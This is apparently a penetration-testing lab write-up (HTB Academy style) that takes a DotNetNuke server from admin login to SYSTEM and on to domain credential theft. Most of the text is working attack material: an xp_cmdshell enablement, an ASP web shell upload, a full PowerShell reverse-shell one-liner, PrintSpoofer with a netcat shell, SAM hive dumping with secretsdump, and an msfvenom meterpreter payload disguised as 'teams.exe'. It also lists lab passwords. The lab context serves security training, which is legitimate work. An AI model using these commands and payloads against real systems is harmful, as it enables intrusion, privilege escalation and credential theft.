βοΈExploitation & Privilege Escalation
π― Overview
Exploitation & Privilege Escalation transforms credential discovery into SYSTEM-level access on internal hosts. Leverage DotNetNuke (DNN) administrative access, enable xp_cmdshell, exploit SeImpersonate privileges with PrintSpoofer, and establish multiple persistence methods for reliable internal network control.
π DotNetNuke (DNN) Exploitation
π Administrative Access
# Credential validation from NFS discovery
Administrator:D0tn31Nuk3R0ck$$@123
# Source: /DEV01/DNN/web.config
# Login verification
http://172.16.8.20/Login?returnurl=%2fadmin
# Result: SuperUser administrator account access
# Findings to document:
1. Insecure File Shares (NFS anonymous access)
2. Sensitive Data on File Shares (credentials in config)π οΈ SQL Console Exploitation
-- Enable xp_cmdshell for command execution
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- Test command execution
xp_cmdshell 'whoami'
-- Output: nt service\mssql$sqlexpressπ File Extension Bypass
# DNN file upload configuration:
1. Settings β Security β More β More Security Settings
2. Allowable File Extensions: asp,aspx,exe,SAVE
3. Save configuration
# Upload capabilities enabled:
- ASP web shells (.asp, .aspx)
- Executable files (.exe)
- Registry dumps (.SAVE)πΊ Privilege Escalation Techniques
π₯οΈ Web Shell Deployment
# ASP web shell upload
1. Download newcmdasp.asp from GitHub
2. Upload via DNN File Management (/admin/file-management)
3. Access web shell via uploaded file URL
4. Test command execution: whoami
# Result: iis apppool\dotnetnukeapppool
# Privileges: SeImpersonate (exploitable)π PowerShell Reverse Shell
# Reverse shell payload (from web shell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('172.16.8.120',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Listener setup (on dmz01):
nc -nvlp 9999
# Result: Interactive PowerShell sessionπ― PrintSpoofer Exploitation
# Prerequisites:
1. Upload nc.exe and PrintSpoofer64.exe via DNN
2. Verify SeImpersonate privilege
3. Setup listener on dmz01
# PrintSpoofer execution:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"
# Expected privileges:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
# Result: NT AUTHORITY\SYSTEM shellπΎ Credential Harvesting
π SAM Database Extraction
# Registry hive dumping (as SYSTEM):
reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE
# Download via DNN file manager:
1. Navigate to /admin/file-management
2. Download SYSTEM.SAVE, SECURITY.SAVE, SAM.SAVE
3. Transfer to attack host for analysisπ Secretsdump Analysis
# Credential extraction
secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE
# Local account hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
# Domain cached credentials:
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#[HASH]
# LSA Secrets:
DefaultPassword: Gr8hambino!
# Associated user: hporter (domain account)π― Domain Credentials Discovery
# First domain credential pair discovered:
hporter:Gr8hambino!
# Source: LSA Secrets DefaultPassword
# Validation from SYSTEM shell:
net user hporter /dom
# Output: Domain Users group membership confirmed
# Password last set: 6/1/2022
# Account active: Yesπ Alternative Attack Methods
π Reverse Port Forwarding
# Scenario: Direct reverse shell from DEV01 to attack host
# 1. Generate payload (target: dmz01 IP)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443
# 2. Setup multi/handler (attack host)
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 7000
run
# 3. SSH reverse port forwarding
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@TARGET_IP -vN
# 4. Execute payload on DEV01
teams.exe
# Result: Meterpreter session through port forwardingβοΈ SSH Configuration Requirements
# GatewayPorts configuration (if needed):
# Edit /etc/ssh/sshd_config on dmz01:
GatewayPorts yes # Change from 'no' to 'yes'
# Reload SSH service:
service sshd reload
# Security consideration:
- Client approval required for config changes
- Document all modifications
- Revert changes post-assessment
- Note security implications in reportπ― Multiple Access Vectors
π Attack Path Diversity
# Method 1: SQL Console β xp_cmdshell
DNN Admin β Settings β SQL Console β Command execution
# Method 2: File Upload β ASP Web Shell
DNN Admin β File Extensions β Upload newcmdasp.asp β RCE
# Method 3: Direct Credential Usage
hporter:Gr8hambino! β SMB/RDP/WinRM access
# Method 4: Pass-the-Hash
Administrator NT hash β Direct authenticationπ‘οΈ Persistence Mechanisms
# Local administrator access:
- SAM database hash extraction
- Pass-the-hash authentication capability
- Local admin account compromise
# Domain account access:
- hporter:Gr8hambino! (cleartext)
- Domain Users group membership
- Internal AD enumeration capability
# System-level access:
- NT AUTHORITY\SYSTEM shell
- Registry access and modification
- Service manipulation capabilitiesπ― Active Directory Preparation
π Domain Intelligence Gathered
# Domain information:
Domain: INLANEFREIGHT.LOCAL
Domain Controller: 172.16.8.3
Domain SID: S-1-5-21-2814148634-3729814499-1637837074
# Compromised accounts:
hporter (Domain Users) - cleartext password
Administrator (DEV01 local) - NT hash
mpalledorous (DEV01 local) - NT hash
# Network positioning:
- SYSTEM access on DEV01 (172.16.8.20)
- Root access on dmz01 (172.16.8.120)
- Direct connectivity to Domain Controllerπ Next Phase Planning
# AD enumeration priorities:
1. BloodHound data collection
2. Domain user enumeration
3. Service account discovery
4. Group membership analysis
5. Trust relationship mapping
# Lateral movement opportunities:
- Kerberoasting attacks
- ASREPRoasting attempts
- Password spraying campaigns
- SMB share enumeration
- Privilege escalation huntingπ― HTB Academy Labs
π Lab Solution Summary
# Lab 1: SAM Database Extraction
1. DNN admin access β Administrator:D0tn31Nuk3R0ck$$@123
2. File extension modification β asp,aspx,exe,SAVE
3. Web shell upload β newcmdasp.asp deployment
4. PrintSpoofer exploitation β SYSTEM privilege escalation
5. Registry hive dumping β SAM, SYSTEM, SECURITY
6. Secretsdump analysis β Administrator NT hash extraction
# Lab 2: Administrator Desktop Flag
1. SYSTEM shell establishment β PrintSpoofer execution
2. Privilege verification β NT AUTHORITY\SYSTEM
3. Flag retrieval β C:\Users\Administrator\Desktop\flag.txtπ Key Learning Points
# Technical skills:
- DNN administrative functionality abuse
- SQL Server xp_cmdshell exploitation
- SeImpersonate privilege escalation
- Windows registry credential extraction
# Professional methodology:
- Multiple attack vector development
- Persistence mechanism establishment
- Evidence collection standards
- Systematic privilege escalation
# Real-world scenarios:
- Development environment exploitation
- Configuration file credential mining
- Built-in functionality abuse
- Domain preparation techniquesπ‘οΈ Defensive Recommendations
π Application Security
# DNN hardening:
- Disable SQL Console access
- Restrict file upload extensions
- Implement admin approval workflows
- Regular credential rotation
# SQL Server security:
- Disable xp_cmdshell by default
- Implement least privilege access
- Monitor database admin activities
- Use dedicated service accounts
# File share security:
- Disable anonymous NFS access
- Implement proper access controls
- Encrypt sensitive configuration files
- Regular share permission auditsLast updated